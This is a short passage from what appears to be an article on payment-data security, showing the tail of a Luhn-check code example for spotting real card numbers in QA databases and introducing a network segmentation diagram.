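print(luhn_valid("1234567890123456"))  # False
```

It will throw false positives, but anything it flags in a QA database deserves a hard look, because real data has a way of quietly migrating into test environments.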

Below is a crude diagram to try and help illustrate this concept. Please note that this does not reflect actual firewall or network placement. It merely tries to illustrate the segmentation.